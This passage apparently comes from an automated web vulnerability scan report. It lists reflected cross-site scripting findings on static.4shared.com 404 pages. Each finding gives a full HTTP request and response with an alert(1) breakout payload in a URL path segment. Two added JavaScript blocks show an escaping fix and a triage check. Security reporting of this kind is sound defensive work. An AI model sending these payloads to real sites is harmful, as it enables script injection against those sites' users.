Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images14de5&quot;-alert(1)-&quot;e4251d0b96d/all1.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B90B8CFFF92E414656949961A77BB453.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images14de5"-alert(1)-"e4251d0b96d/all1.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.409. http://static.4shared.com/images/all1.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/all1.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d50a"-alert(1)-"fe06872aee9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/all1.png6d50a"-alert(1)-"fe06872aee9 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/all1.png6d50a&quot;-alert(1)-&quot;fe06872aee9
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F60A78D00D8D111A732C99A0F05AEB4D.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:23 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/all1.png6d50a"-alert(1)-"fe06872aee9";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.410. http://static.4shared.com/images/bg14.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/bg14.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12272"-alert(1)-"abf7e4d3c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images12272"-alert(1)-"abf7e4d3c4/bg14.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images12272&quot;-alert(1)-&quot;abf7e4d3c4/bg14.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=43D79AA9EFAA9A673546765B9249A7AC.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:38 GMT
Content-Length: 36173


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images12272"-alert(1)-"abf7e4d3c4/bg14.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.411. http://static.4shared.com/images/bg14.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/bg14.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69174"-alert(1)-"fe2d06cbac0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bg14.png69174"-alert(1)-"fe2d06cbac0 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/bg14.png69174&quot;-alert(1)-&quot;fe2d06cbac0
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B7E590F3655F47E51A63A0676D1F9F48.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:43 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/bg14.png69174"-alert(1)-"fe2d06cbac0";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.412. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/facebook/login-button.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a64c"-alert(1)-"ffcb7e388af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images7a64c"-alert(1)-"ffcb7e388af/facebook/login-button.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images7a64c&quot;-alert(1)-&quot;ffcb7e388af/facebook/login-button.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5B2A45DC50C460E287C02F9C2D8C0CA2.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:15 GMT
Content-Length: 36274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images7a64c"-alert(1)-"ffcb7e388af/facebook/login-button.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function f
...[SNIP]...

3.413. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/facebook/login-button.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d708"-alert(1)-"02fd9aad990 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/facebook7d708"-alert(1)-"02fd9aad990/login-button.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/facebook7d708&quot;-alert(1)-&quot;02fd9aad990/login-button.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=28CE1CB951BF35E4F350801829B3A789.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:21 GMT
Content-Length: 36274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/facebook7d708"-alert(1)-"02fd9aad990/login-button.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.414. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/facebook/login-button.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9ec6"-alert(1)-"d0a9f28947d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/facebook/login-button.pnge9ec6"-alert(1)-"d0a9f28947d HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/facebook/login-button.pnge9ec6&quot;-alert(1)-&quot;d0a9f28947d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E747ED2ED4DEE1341BDB3FC96D31DF00.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:27 GMT
Content-Length: 36274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/facebook/login-button.pnge9ec6"-alert(1)-"d0a9f28947d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...
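Every static.4shared.com finding in this section has the same shape: the 404 page builds a JavaScript string literal (`var url="/abuse.jsp?aLink=http://static.4shared.com<path>"`) from the raw request path, so a double quote in any path segment ends the literal early and the remainder runs as script. The example below is added here and is not code from 4shared.com or from the scanner; `renderVulnerable()` reconstructs that template from the captured response (the server-side source is not on the page, so the template is an assumption), `jsStringEscape()` is the context-aware fix, and `executeRendered()` runs each rendered line with a stub `alert()` so the difference is observable rather than asserted.

```javascript
// Added example, not code from 4shared.com: the 404 page above builds a
// JavaScript string literal from the raw request path, so a double quote in
// the path closes the literal early. renderVulnerable() reconstructs that
// template from the captured response (an assumption about the server-side
// code, which is not on the page); renderHardened() applies the fix.

// Reconstructed vulnerable template: request path concatenated verbatim.
function renderVulnerable(requestPath) {
  return 'var url="/abuse.jsp?aLink=http://static.4shared.com' + requestPath + '";';
}

// Context-aware encoder for data placed inside a JavaScript string literal
// that itself sits inside an HTML <script> element. Every non-alphanumeric
// UTF-16 code unit becomes \uXXXX, so a quote cannot end the literal and a
// '<' or '/' cannot form "</script>" and end the element.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened template: same output shape, encoded data.
function renderHardened(requestPath) {
  return 'var url="/abuse.jsp?aLink=http://static.4shared.com' + jsStringEscape(requestPath) + '";';
}

// Runs one rendered script line in a scratch function scope with a stub
// alert() and reports what `url` ended up as and whether alert() fired.
function executeRendered(scriptLine) {
  const alertCalls = [];
  const stubAlert = (arg) => { alertCalls.push(arg); };
  const url = new Function('alert', scriptLine + ' return url;')(stubAlert);
  return { url, alertCalls };
}

// Payload from finding 3.414 above (REST URL parameter 3).
const PAYLOAD_PATH = '/images/facebook/login-button.pnge9ec6"-alert(1)-"d0a9f28947d';

// Side-by-side result: the vulnerable line calls alert(1) and leaves `url`
// as NaN (string minus undefined); the hardened line never leaves the
// string literal and `url` is exactly the intended link.
function compare(requestPath) {
  return {
    vulnerable: executeRendered(renderVulnerable(requestPath)),
    hardened: executeRendered(renderHardened(requestPath)),
  };
}

console.log(JSON.stringify(compare(PAYLOAD_PATH), null, 2));
```

Two caveats worth keeping in mind when fixing this class of bug. HTML entity encoding, which the server already applies in the 404 status line (`&quot;`), is the wrong encoder for a script context: the browser does not decode entities inside `<script>`, so `&quot;` would end up literally in the URL while a raw `"` still breaks out; the data must be encoded for the JavaScript-string context first. The more robust design is not to embed the request path server-side at all: the client can build the abuse link from `location.href` with `encodeURIComponent()`, which removes the reflection entirely.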

3.415. http://static.4shared.com/images/googleW.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/googleW.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 393fb"-alert(1)-"ee3174caf07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images393fb"-alert(1)-"ee3174caf07/googleW.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images393fb&quot;-alert(1)-&quot;ee3174caf07/googleW.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=532AA185B4FE1F95997702082EEC4FD9.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:10 GMT
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images393fb"-alert(1)-"ee3174caf07/googleW.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...
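The "Confidence: Certain" rating on these findings rests on one observation: the probe's random prefix and suffix come back with the double quote between them intact, and that reflection sits inside a `<script>` element. The same path is also reflected entity-encoded in the 404 status line, which is harmless. The triage check below, added here and not part of the scanner or the page, makes that distinction explicit; the `<script>` lines of its sample body are taken from the 3.415 response above, while the `<title>` line is constructed (an assumption mirroring the entity encoding seen in the captured status line) so the sample contains one reflection of each kind.

```javascript
// Added example, not code from the page or from 4shared.com: a triage check
// that separates reflections of the probe inside a <script> element with the
// quote intact (exploitable, as in finding 3.415) from reflections that are
// entity-encoded or outside script context (not exploitable by this payload).

// Offsets of every <script>...</script> element in the body.
function locateScriptRanges(html) {
  const ranges = [];
  const re = /<script\b[^>]*>[\s\S]*?<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    ranges.push([m.index, m.index + m[0].length]);
  }
  return ranges;
}

// Finds each occurrence of the probe's random prefix/suffix pair and records
// where it landed and whether the double quote between them survived raw.
function classifyReflections(body, prefix, suffix) {
  const scriptRanges = locateScriptRanges(body);
  const results = [];
  let from = 0;
  for (;;) {
    const start = body.indexOf(prefix, from);
    if (start === -1) break;
    const end = body.indexOf(suffix, start + prefix.length);
    if (end === -1) break;
    const reflected = body.slice(start + prefix.length, end);
    const inScript = scriptRanges.some(([a, b]) => start >= a && end < b);
    results.push({
      offset: start,
      context: inScript ? 'script' : 'html',
      rawQuote: reflected.includes('"'),
      reflected,
    });
    from = end + suffix.length;
  }
  return results;
}

// The condition behind "Confidence: Certain" for this payload shape:
// at least one raw-quote reflection inside a script element.
function isExploitable(results) {
  return results.some((r) => r.context === 'script' && r.rawQuote);
}

// Constructed sample body. The <script> lines are taken from the 3.415
// response above; the <title> line is an assumption that mirrors the
// entity encoding seen in the captured 404 status line.
const SAMPLE_BODY = [
  '<html><head>',
  '<title>404 /images393fb&quot;-alert(1)-&quot;ee3174caf07/googleW.png</title>',
  '<script type="text/javascript">',
  'function reportAbuse() {',
  'var windowname="abuse";',
  'var url="/abuse.jsp?aLink=http://static.4shared.com/images393fb"-alert(1)-"ee3174caf07/googleW.png";',
  '}',
  '</script>',
  '</head></html>',
].join('\n');

// Random prefix/suffix of the probe used in finding 3.415.
const PROBE_PREFIX = '393fb';
const PROBE_SUFFIX = 'ee3174caf07';

function triageSample() {
  const results = classifyReflections(SAMPLE_BODY, PROBE_PREFIX, PROBE_SUFFIX);
  return { results, exploitable: isExploitable(results) };
}

console.log(JSON.stringify(triageSample(), null, 2));
```

Running it over the sample yields two reflections: the `<title>` one in HTML context with the quote encoded, and the `<script>` one with the quote raw, so `exploitable` is true. Re-run after the fix (the quote emitted as `\u0022` inside the script) and the same check reports not exploitable, which is the regression test to keep once the 404 template is corrected.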

3.416. http://static.4shared.com/images/googleW.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/googleW.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f6f"-alert(1)-"4a01f65d839 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/googleW.png41f6f"-alert(1)-"4a01f65d839 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/googleW.png41f6f&quot;-alert(1)-&quot;4a01f65d839
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=019E23D2EE91E7EDD888FD32E0B169F3.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:15 GMT
Content-Length: 36204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/googleW.png41f6f"-alert(1)-"4a01f65d839";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.417. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44c1c"-alert(1)-"a0a1c09ce47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images44c1c"-alert(1)-"a0a1c09ce47/icons/16x16/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images44c1c&quot;-alert(1)-&quot;a0a1c09ce47/icons/16x16/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6F1B92C331007CBC25069E048B75DF96.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:20 GMT
Content-Length: 36243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images44c1c"-alert(1)-"a0a1c09ce47/icons/16x16/close.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

3.418. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9db94"-alert(1)-"6dac60dedfd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons9db94"-alert(1)-"6dac60dedfd/16x16/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons9db94&quot;-alert(1)-&quot;6dac60dedfd/16x16/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=12E25BC3F676E23105B6E28B2550FFC7.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:26 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons9db94"-alert(1)-"6dac60dedfd/16x16/close.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.419. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
